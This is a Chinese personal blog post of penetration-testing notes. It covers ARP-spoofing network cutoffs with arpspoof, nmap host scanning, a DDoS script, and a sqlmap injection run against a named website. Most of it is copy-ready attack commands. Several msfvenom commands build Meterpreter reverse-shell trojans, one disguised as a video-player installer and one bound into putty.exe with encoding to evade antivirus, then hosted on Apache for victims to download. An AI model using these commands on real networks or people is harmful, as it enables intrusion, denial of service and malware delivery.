渗透测试之APR断网
渗透测试之APR断网
在kaili中,可以通过nmap扫描路由下存活主机和它开放的端口,之后可以通过攻击目标主机IP和网关实现断网攻击
比如当你链接一个网络,首先在本地查询当前网络的网关,然后扫描网关下存活的主机,最后通过主机IP实现攻击
文章
前言
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
一句话解释: 断网攻击用使用ARPspoof工具,欺骗设备,截断网关和被攻击主机之间的正常通信
请勿用于违法用途!
首先进入root用户
执行命令,然后输入你装系统的时候的密码,然后按Enter键
1 | su |
使用ipconfig查看自己网卡名称和网关。
例如我的网卡叫eth0。注意不要选错了,笔记本电脑有无线网卡和有线网卡,有线网卡一般叫eth0,有线网卡一般叫lo之类的名字。确认好你正在用什么方式联网,是网线还是WiFi,WiFi就是无线网卡,插网线就是有线网卡
查看网关,你和被攻击主机在同一个网络下,所以你的网关和被攻击主机的网关是一样的
其实如果你能看到路由器的话,也可以直接去看路由器管理页面的网址,一般是192.168.0.1,这个网址就是网关地址
1 | ifconfig |
使用nmap工具扫描设备
查看被攻击主机的IP地址,然后稍等片刻,扫描结果就会出来,命令格式是这样的:
1 | nmap 你网关IP地址-200 |
比如我的网关是192.168.0.1 ,我的命令应该这样写
1 | nmap 192.168.0.1-200 |
然后扫出来一些设备,在这些设备里面找你的攻击目标的IP地址
图为我的网关,和我电脑的ip地址,被攻击设备的ip我就不展示了。
你在输出内容里面能看到网关,自己电脑IP,被攻击主机IP
开始攻击
现在开始攻击,命令的格式是这样的,你刚刚已经把被攻击主机ip和网关的ip查好了
1 | arpspoof -i eth0 -t 被攻击主机ip 网关 |
例如我想给我边上的笔记本电脑断网,那我就加上它的ip和网关,注意中间有空格
比如笔记本电脑的IP是192.168.0.102,网关是192.168.0.1
arpspoof -i eth0 -t 192.168.1.102 192.168.0.1
这样就可以断掉笔记本电脑的网络了
ARP攻击可以用于各种设备,我试过家里联网的能远程查看的监控也可以被攻击,亲手断过它的网,因为不喜欢被监视,(^▽^)
大家家里有没有监控呢?
如果有问题,欢迎请加入Skype群探讨!
————————————————
1 | 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 |
原文链接:https://blog.csdn.net/albertensterin/article/details/128510328
后续清理
一旦停止ARP欺骗攻击,网络不会立即恢复正常状态。由于ARP缓存中可能已经存储了虚假的映射关系,因此需要一定时间才能够自动清除这些错误的ARP条目并重新建立正确的映射。
在某些情况下,受影响的主机可能需要等待一段时间才能够恢复到正常状态。但通常情况下,网络会随着时间的推移逐渐恢复正常。如果需要更快地恢复网络状态,可以尝试执行以下操作:
- 在受影响的主机上手动清除ARP缓存。
- 重启受影响的设备,以便清除错误的ARP缓存。
在进行安全测试时,请务必小心谨慎,并且确保拥有适当的授权。
清除ARP缓存可以通过以下方法进行:
在Windows上,可以打开命令提示符并执行以下命令:
1 | arp -d \* |
这将删除系统中所有已知的ARP条目。
在Linux上,可以打开终端并以root权限执行以下命令:
1 | ip neigh flush all |
这将清除系统中所有的邻居(包括ARP)缓存。
请注意,在执行这些命令时,可能会导致一些网络连接中断,因此请谨慎操作。
快速复制
shenglang
1 | arpspoof -i eth0 -t 192.168.2.35 192.168.2.1 |
使用nmap 可以扫描端口
1 | nmap [ip] |
使用nmap -o 查询主机系统信息
1 | nmap -o [ip] |
查询网关
1 | nmap -sP [ip] |
扫描当前子网下的所有存活主机 比如你的ip是192.168.2.21 你想要扫描你这个网络下的所有Ip你可以使用
1 | nmap 192.168.2.0/24 |
34 35 37 38 39 40 43 46 53 64 36
192.168.2.34
192.168.2.39 是一个存活主机 win10
arpspoof -i eth0 -t 192.168.2.37 192.168.2.1
DDOS
我已经提前再kali下载了脚本所以直接进入 ddos 文件夹内 使用
1 | python ddos-p3.py |
如果没有下载可以使用
1 | git clone https://github.com/Andysun06/ddos |
远控木马
msfvenom
链接:https://www.cnblogs.com/Cl0ud/p/11756544.html
生成
1 | msfvenom -p windows/meterpreter/reverse\_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe |
LHOST就是你kali的ip地址,LPORT就是想要让kali监听用哪一个端口来监听这个shell,然后将这个生成的exe文件输出到当前目录下Cl0ud.exe
比如
开启metasploit框架
1 | msfconsole |
生成木马 msf5的生成代码
1 | msfconsole -p windows/meterpreter/reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -f exe > ./Cl0ud.exe |
msf6:
1 | msfvenom -p linux/x64/meterpreter\_reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -f elf > shell.elf |
不容易被免杀的方法
1 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -b "\x00" -e x64/xor\_dynamic -i 10 -f exe -o /var/www/html/西瓜影音.exe |
1 | 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 |
原文链接:https://blog.csdn.net/qq_53030229/article/details/116751107
1 | set payload windows/meterpreter/reverse\_tcp |
监听
1 | exploit |
生成针对win10的反弹shell
1 | msfvenom -p windows/meterpreter/reverse\_tcp lhost=192.168.2.36 lport=1234 -f exe >jiami.exe |
1 | 这个解释一下 |
木马放到apache下,然后windows才能访问才能下载
1 | cp muma.exe /var/www/html/ |
如果需要生成shellCode可以使用
1 | msfvenom -p windows/x64/meterpreter/reverse\_tcp lhost=192.168.2.44 lport=4444 --encrypt base64 -f c |
运行监听
1 | msfconsole |
开始网站服务
1 | service apache2 start |
关闭网站服务
1 | service apache2 stop |
这时候再同一网络的浏览器访问
1 | http://192.168.2.44/hello.exe |
就可以自动下载,由于没有免杀所以会被排除
SSH
1、查看ssh状态
1 | /etc/init.d/ssh status |
2、重启、开启、关闭ssh
重启ssh
1 | /etc/init.d/ssh restart |
开启ssh
1 | /etc/init.d/ssh start |
关闭ssh
1 | /etc/init.d/ssh stop |
msf自捆绑编码
1 | wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe |
1 | msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -e x86/shikata\_ga\_nai -x putty.exe -i 15 -f exe -o pentest4.exe |
查看磁盘情况
1 | df -h |
加壳
slqmap
当程序有防get注入的时候,可以使用cookie注入
1 | sqlmap -u "http://www.bjxhyn.com/index.php?m=admin&c=index&a=login&pc\_hash=?id=1" |
- Title: 渗透测试之APR断网
- Author: owofile
- Created at : 2024-02-27 03:49:31
- Updated at : 2025-04-11 21:18:27
- Link: https://owofile.github.io/blog/2024/02/27/渗透测试之APR断网/
- License: This work is licensed under CC BY-NC-SA 4.0.